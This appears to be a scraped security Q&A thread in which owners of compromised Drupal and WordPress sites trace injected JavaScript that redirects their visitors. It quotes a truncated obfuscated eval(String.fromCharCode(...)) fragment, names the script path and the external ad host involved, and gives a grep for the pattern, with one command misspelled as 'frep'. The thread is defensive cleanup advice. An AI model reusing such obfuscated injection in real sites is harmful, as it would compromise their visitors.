  • In firefox developer mode, it is a "Persist Logs"checkbox under network

Take the compromised xuzo.com as example, open the website in browser developer mode and the log presrevation enabled, you can see something like following before it jump to another website



https://ads.voipnewswire.net/ad.js initiator is 
http://xuzo.com/sites/default/files/js/js_5yveJEfYnvdHe_DxshzrVq3ttzeNp-8Ai8MVx1bt2eo.js


Open the file, you will see something like this in the header



eval(String.fromCharCode(118, 97, 114, 32, 10....


Unfortunately, String.fromCharCode is legitimate Javascript code and frequently used by many website to hide info such as email address from spammer. I doubt security software can use String.fromCharCode as a reason to locate the bad code without generate a lot of false alarm.



However, if you never use such code, a simple fgrep will help you locate the files, e.g.



frep -lR 'fromCharCode' '/path/to/cms/'





share|improve this answer




















  • Thats sounds good, I think I never use such code, these are just Drupal and Worpress sites, how do I run the fgrep, I use Cpanel, is it a simple find and replace?
    – Bruno Vincent
    Sep 13 at 9:30










  • Additionally, it seems the scripts load randomly, only on first page load, second time around the script doesn;t always run, so seems it's made to load randomly or for first time load? So the hosting company thinks it's fixed, but it's not...;(
    – Bruno Vincent
    Sep 13 at 9:31










  • @BrunoVincent I think you should focus on stuff that store inside /sites/default/files/js/. If you cannot find anything there, then you need to check drupal code or web server and see alias path mapping to that path.
    – mootmoot
    Sep 13 at 9:41












up vote
0
down vote










up vote
0
down vote









Just to @Moonsik Park answer : You can use Browser developer mode redirect log preservation features to locate which script do the redirect.



  • In Google developer mode, it is a "Preserve log" checkbox under network

  • In firefox developer mode, it is a "Persist Logs"checkbox under network

Take the compromised xuzo.com as example, open the website in browser developer mode and the log presrevation enabled, you can see something like following before it jump to another website



https://ads.voipnewswire.net/ad.js initiator is 
http://xuzo.com/sites/default/files/js/js_5yveJEfYnvdHe_DxshzrVq3ttzeNp-8Ai8MVx1bt2eo.js


Open the file, you will see something like this in the header



eval(String.fromCharCode(118, 97, 114, 32, 10....


Unfortunately, String.fromCharCode is legitimate Javascript code and frequently used by many website to hide info such as email address from spammer. I doubt security software can use String.fromCharCode as a reason to locate the bad code without generate a lot of false alarm.



However, if you never use such code, a simple fgrep will help you locate the files, e.g.



frep -lR 'fromCharCode' '/path/to/cms/'





share|improve this answer












Just to @Moonsik Park answer : You can use Browser developer mode redirect log preservation features to locate which script do the redirect.



  • In Google developer mode, it is a "Preserve log" checkbox under network

  • In firefox developer mode, it is a "Persist Logs"checkbox under network

Take the compromised xuzo.com as example, open the website in browser developer mode and the log presrevation enabled, you can see something like following before it jump to another website



https://ads.voipnewswire.net/ad.js initiator is 
http://xuzo.com/sites/default/files/js/js_5yveJEfYnvdHe_DxshzrVq3ttzeNp-8Ai8MVx1bt2eo.js


Open the file, you will see something like this in the header



eval(String.fromCharCode(118, 97, 114, 32, 10....


Unfortunately, String.fromCharCode is legitimate Javascript code and frequently used by many website to hide info such as email address from spammer. I doubt security software can use String.fromCharCode as a reason to locate the bad code without generate a lot of false alarm.



However, if you never use such code, a simple fgrep will help you locate the files, e.g.



frep -lR 'fromCharCode' '/path/to/cms/'






share|improve this answer












share|improve this answer



share|improve this answer










answered Sep 13 at 9:23









mootmoot

1,436313




1,436313











  • Thats sounds good, I think I never use such code, these are just Drupal and Worpress sites, how do I run the fgrep, I use Cpanel, is it a simple find and replace?
    – Bruno Vincent
    Sep 13 at 9:30










  • Additionally, it seems the scripts load randomly, only on first page load, second time around the script doesn;t always run, so seems it's made to load randomly or for first time load? So the hosting company thinks it's fixed, but it's not...;(
    – Bruno Vincent
    Sep 13 at 9:31










  • @BrunoVincent I think you should focus on stuff that store inside /sites/default/files/js/. If you cannot find anything there, then you need to check drupal code or web server and see alias path mapping to that path.
    – mootmoot
    Sep 13 at 9:41
















  • Thats sounds good, I think I never use such code, these are just Drupal and Worpress sites, how do I run the fgrep, I use Cpanel, is it a simple find and replace?
    – Bruno Vincent
    Sep 13 at 9:30










  • Additionally, it seems the scripts load randomly, only on first page load, second time around the script doesn;t always run, so seems it's made to load randomly or for first time load? So the hosting company thinks it's fixed, but it's not...;(
    – Bruno Vincent
    Sep 13 at 9:31










  • @BrunoVincent I think you should focus on stuff that store inside /sites/default/files/js/. If you cannot find anything there, then you need to check drupal code or web server and see alias path mapping to that path.
    – mootmoot
    Sep 13 at 9:41















Thats sounds good, I think I never use such code, these are just Drupal and Worpress sites, how do I run the fgrep, I use Cpanel, is it a simple find and replace?
– Bruno Vincent
Sep 13 at 9:30




Thats sounds good, I think I never use such code, these are just Drupal and Worpress sites, how do I run the fgrep, I use Cpanel, is it a simple find and replace?
– Bruno Vincent
Sep 13 at 9:30












Additionally, it seems the scripts load randomly, only on first page load, second time around the script doesn;t always run, so seems it's made to load randomly or for first time load? So the hosting company thinks it's fixed, but it's not...;(
– Bruno Vincent
Sep 13 at 9:31




Additionally, it seems the scripts load randomly, only on first page load, second time around the script doesn;t always run, so seems it's made to load randomly or for first time load? So the hosting company thinks it's fixed, but it's not...;(
– Bruno Vincent
Sep 13 at 9:31












@BrunoVincent I think you should focus on stuff that store inside /sites/default/files/js/. If you cannot find anything there, then you need to check drupal code or web server and see alias path mapping to that path.
– mootmoot
Sep 13 at 9:41




@BrunoVincent I think you should focus on stuff that store inside /sites/default/files/js/. If you cannot find anything there, then you need to check drupal code or web server and see alias path mapping to that path.
– mootmoot
Sep 13 at 9:41










up vote
0
down vote













I had the same problem a few days ago. More than 15 sites were affected. I installed the "Better Search and Replace" plugin to search for the specific javascript. Then I removed the code (using the replace function) and it seemed to do the job. However, I'm investigating how "they" succeeded in injecting the code.






share|improve this answer






















  • But these were wordpress sites right? Who are you hosting with also? Mine is with namecheap.com, did you touch any sites, were all your installations up to date?
    – Bruno Vincent
    Sep 13 at 9:35











  • Just search your wordpress version for vulnerabilities. But I will suggest back up everything and install a patched CMS.
    – mootmoot
    Sep 13 at 10:18














up vote
0
down vote













I had the same problem a few days ago. More than 15 sites were affected. I installed the "Better Search and Replace" plugin to search for the specific javascript. Then I removed the code (using the replace function) and it seemed to do the job. However, I'm investigating how "they" succeeded in injecting the code.






share|improve this answer






















  • But these were wordpress sites right? Who are you hosting with also? Mine is with namecheap.com, did you touch any sites, were all your installations up to date?
    – Bruno Vincent
    Sep 13 at 9:35











  • Just search your wordpress version for vulnerabilities. But I will suggest back up everything and install a patched CMS.
    – mootmoot
    Sep 13 at 10:18












up vote
0
down vote










up vote
0
down vote









I had the same problem a few days ago. More than 15 sites were affected. I installed the "Better Search and Replace" plugin to search for the specific javascript. Then I removed the code (using the replace function) and it seemed to do the job. However, I'm investigating how "they" succeeded in injecting the code.






share|improve this answer














I had the same problem a few days ago. More than 15 sites were affected. I installed the "Better Search and Replace" plugin to search for the specific javascript. Then I removed the code (using the replace function) and it seemed to do the job. However, I'm investigating how "they" succeeded in injecting the code.







share|improve this answer














share|improve this answer



share|improve this answer








edited Sep 13 at 10:05









schroeder♦

66.2k25140177




66.2k25140177










answered Sep 13 at 9:24









Andreas

1




1











  • But these were wordpress sites right? Who are you hosting with also? Mine is with namecheap.com, did you touch any sites, were all your installations up to date?
    – Bruno Vincent
    Sep 13 at 9:35











  • Just search your wordpress version for vulnerabilities. But I will suggest back up everything and install a patched CMS.
    – mootmoot
    Sep 13 at 10:18
















  • But these were wordpress sites right? Who are you hosting with also? Mine is with namecheap.com, did you touch any sites, were all your installations up to date?
    – Bruno Vincent
    Sep 13 at 9:35











  • Just search your wordpress version for vulnerabilities. But I will suggest back up everything and install a patched CMS.
    – mootmoot
    Sep 13 at 10:18















But these were wordpress sites right? Who are you hosting with also? Mine is with namecheap.com, did you touch any sites, were all your installations up to date?
– Bruno Vincent
Sep 13 at 9:35





But these were wordpress sites right? Who are you hosting with also? Mine is with namecheap.com, did you touch any sites, were all your installations up to date?
– Bruno Vincent
Sep 13 at 9:35













Just search your wordpress version for vulnerabilities. But I will suggest back up everything and install a patched CMS.
– mootmoot
Sep 13 at 10:18




Just search your wordpress version for vulnerabilities. But I will suggest back up everything and install a patched CMS.
– mootmoot
Sep 13 at 10:18


Popular posts from this blog

How to check contact read email or not when send email to Individual?

Displaying single band from multi-band raster using QGIS

How many registers does an x86_64 CPU actually have?